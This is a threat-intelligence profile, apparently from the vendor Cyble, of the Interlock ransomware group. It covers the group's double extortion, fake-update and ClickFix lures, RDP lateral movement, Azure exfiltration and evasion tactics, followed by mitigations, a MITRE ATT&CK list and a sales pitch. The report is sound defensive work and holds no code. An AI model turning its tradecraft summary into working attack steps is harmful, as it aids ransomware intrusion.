Threat Actor Profile: Interlock Ransomware Group

The Interlock ransomware group has maintained a relatively low public profile compared to relatively higher-profile threat actors.  Since its emergence, its operations have targeted large-scale organizations. These attacks are marked by a calculated blend of data theft and encryption, leveraging a double extortion strategy to coerce payments from victims. 

Victims infected by Interlock find their files encrypted with the distinctive “.interlock” extension, accompanied by detailed ransom notes. These notes direct them to structured negotiation portals that often include live chat interfaces or email contacts. A major pressure point is the looming threat of public data exposure through a leak site known as the “Worldwide Secrets Blog,” a tactic designed to compound reputational damage alongside financial extortion. 

Interlock’s Command-and-Control (C2) infrastructure is tightly controlled and obfuscated, often using encrypted communication channels. The malware also employs “living off the land” techniques, utilizing legitimate system binaries like rundll32.exe to avoid detection. Obfuscation is further achieved through software packing (notably with PyInstaller) and encrypted payloads. 

Key defense evasion strategies include: 

• Obfuscating files using hardcoded passwords. 

• Using misleading filenames and mimicking legitimate software products. 

• Clearing Windows Event Logs to eliminate forensic traces. 

• Exploiting inactive or dormant user accounts to avoid triggering alerts. 

Registry modifications and startup persistence tactics also help maintain access to compromised machines. For example, Interlock creates registry run keys or drops .lnk shortcut files into Windows Startup folders. 

Target Profile and Geographic Spread 

Interlock’s campaigns have a global reach, with confirmed attacks in Canada, Italy, Mexico, and the United States. They target a diverse range of industries, including aerospace and defense, automotive, banking and financial services, construction, consumer goods, education, food and beverage, government and law enforcement, healthcare, media and entertainment, professional services, real estate, technology, and transportation and logistics. 

Further research has noted striking similarities between Interlock and other ransomware families, especially Rhysida, leading to theories that the same underlying actor may have developed both. Further links have also been drawn to Vice Society (also known as Vanilla Tempest), a threat group previously flagged by Microsoft in 2022 for its use of INC ransomware against U.S.-based entities. 

Technical Capabilities and Infection Vectors 

Interlock’s ransomware is cross-platform, targeting both Windows and FreeBSD environments. This adaptability signals the group’s strong technical acumen. The initial compromise typically starts with Remote Access Trojans (RATs) masquerading as legitimate software updates. Common lures include fake Google Chrome or Microsoft Edge installers. Once launched, these trojans deploy PowerShell scripts, keyloggers, and credential-stealing tools, laying the groundwork for deeper infiltration. 

From there, the group demonstrates effective lateral movement, primarily through Remote Desktop Protocol (RDP). Tools like AnyDesk and PuTTY help Interlock navigate internal networks and escalate access privileges. For exfiltration, attackers rely on Azure Storage Explorer and AZCopy to transfer stolen data to Azure blob storage, a technique similar to methods used by the Rhysida ransomware group, suggesting potential overlap in infrastructure or personnel. 

In a further evolution of their toolkit, Interlock has incorporated new data-theft utilities such as LummaStealer and BerserkStealer, enhancing its ability to harvest credentials and sensitive files before encryption occurs. The delivery method has also evolved with the group leveraging tools like ClickFix, which uses deceptive CAPTCHAs to trick users into running malicious PowerShell commands. 

Tactics and Techniques Used by Interlock Ransomware Group 

Interlock’s methods closely follow widely recognized cyberattack patterns, using a range of techniques to infiltrate and maintain control over targeted systems. The group typically gains access by stealing login credentials, exploiting security flaws in public-facing applications, or tricking users into downloading malware through deceptive links and fake updates. 

Once inside, they execute malicious code using scripting tools and disguised installers. To remain active within compromised networks, they create persistent footholds by modifying system settings and leveraging existing user accounts. Interlock also escalates its privileges through these compromised credentials and manipulates startup processes to maintain access. 

To avoid detection, the group hides its activity through file obfuscation, software disguise, and system log clearing. Finally, sensitive data is extracted using cloud-based tools, allowing the attackers to store stolen information externally as part of their extortion strategy.  

Conclusion

Interlock is a stealthy, ransomware group known for targeting critical sectors with double extortion tactics. It uses fake software updates, stolen credentials, and cloud exfiltration to pressure victims into paying. Victims face public exposure threats via Interlock’s leak site, adding reputational pressure to the financial demand.  

Cyble offers a powerful defense against threats like Interlock ransomware. As a global leader in AI-driven threat intelligence, Cyble equips organizations with real-time insights, dark web monitoring, and attack surface management through platforms like Cyble Vision. Its cutting-edge capabilities help enterprises, government, and law enforcement stay protected from ransomware groups like Interlock, making Cyble an essential partner in modern cybersecurity. 

Cyble can protect your organization with real-time monitoring, dark web insights, and advanced attack surface management.  
 
Book your Free Demo today. 

Mitigation and Defense Strategies 

• Implement Advanced Email and Web Filtering: Deploy secure email gateways and web filters to block phishing emails and malicious URLs.  

• Apply Strict Access Controls and Monitor Inactive Accounts: Regularly audit user accounts, especially inactive ones, and enforce strong, unique passwords combined with multi-factor authentication (MFA) to reduce the risk of credential abuse. 

• Harden Remote Access and Monitor RDP Usage: Disable Remote Desktop Protocol (RDP) where not necessary. For legitimate use, restrict access through VPN, enforce MFA, and log all remote access activity to detect abnormal behavior early. 

• Deploy Endpoint Detection and Response (EDR) Solutions: Use EDR to identify and neutralize living-off-the-land tactics like PowerShell misuse or registry manipulation. Real-time detection tools can flag obfuscated files and unauthorized system changes. 

• Back Up Data and Test Restoration Processes: Maintain regular, offline backups of critical data and verify restoration capabilities. Ensure backups are protected from modification or deletion by ransomware actors. 

• Patch and Update Systems Promptly: Close security gaps by applying updates and patches to operating systems, applications, and publicly exposed services—especially those hosting business-critical operations. 

MITRE Attack Techniques Associated with the Interlock Ransomware Group 

• Valid Accounts (T1078): Adversaries may abuse compromised credentials to gain access, persistence, and escalate privileges, bypassing security controls. 

• Drive-by Compromise (T1189): The Victim is lured into downloading a malicious file from a compromised legitimate website. 

• Exploit Public-Facing Application (T1190): Use weaknesses in internet-facing hosts or systems, such as software bugs or misconfigurations, to gain network access. 

• PowerShell (T1059.001): RAT executes PowerShell scripts to download and execute malware. 

• Shared Modules (T1129): .dll files executed via rundll32.exe to facilitate malware execution. 

• User Execution (T1204): Victims manually run files, thinking they are safe. 

• Valid Accounts (T1078): Compromised credentials used for persistent access to systems, including VPNs and remote desktop. 

• Registry Run Keys/Startup Folder (T1547.001): Shortcut files or registry keys ensure persistence across reboots. 

• Valid Accounts (T1078): Exploiting compromised credentials to escalate privileges. 

• Registry Run Keys/Startup Folder (T1547.001): Registry keys or shortcut files ensure persistence across reboots. 

• Obfuscated Files or Information (T1027): Malware components are encrypted and decrypted with hardcoded passwords before execution. 

• Software Packing (T1027.002): Fake updaters use PyInstaller for added obfuscation. 

• Match Legitimate Name or Location (T1036.005): Fake updaters mimic legitimate products for user trust. 

• Disable or Modify Tools (T1562.001): EDR tools disabled using system drivers. 

• Reflective Code Loading (T1620): Payloads executed in memory through Invoke-Expression. 

• System Service Discovery (T1007): Adversaries gather information about local system services using tools or OS utility commands. 

• System Network Connections Discovery (T1049): Adversaries list network connections to or from compromised systems to gather more information.